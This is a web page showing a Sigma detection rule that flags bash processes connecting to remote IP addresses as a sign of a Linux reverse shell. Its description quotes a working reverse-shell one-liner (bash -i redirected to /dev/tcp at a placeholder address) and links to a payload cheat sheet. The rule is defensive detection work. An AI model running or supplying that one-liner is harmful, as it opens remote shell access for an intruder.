Linux Reverse Shell Indicator

Aug 28, 2023 · attack.execution attack.t1059.004 ·

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Sigma rule (View on GitHub)

 1title: Linux Reverse Shell Indicator
 2id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
 3status: test
 4description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
 5references:
 6    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
 7author: Florian Roth (Nextron Systems)
 8date: 2021/10/16
 9modified: 2022/12/25
10tags:
11    - attack.execution
12    - attack.t1059.004
13logsource:
14    product: linux
15    category: network_connection
16detection:
17    selection:
18        Image|endswith: '/bin/bash'
19    filter:
20        DestinationIp:
21            - '127.0.0.1'
22            - '0.0.0.0'
23    condition: selection and not filter
24falsepositives:
25    - Unknown
26level: critical

References

PayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at d9921e370b7c668ee8cc42d09b1932c1b98fa9dc · swisskyrepo/PayloadsAllTheThings

A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings

Read More

Linux Reverse Shell Indicator

Sigma rule (View on GitHub)

References

PayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at d9921e370b7c668ee8cc42d09b1932c1b98fa9dc · swisskyrepo/PayloadsAllTheThings

Related rules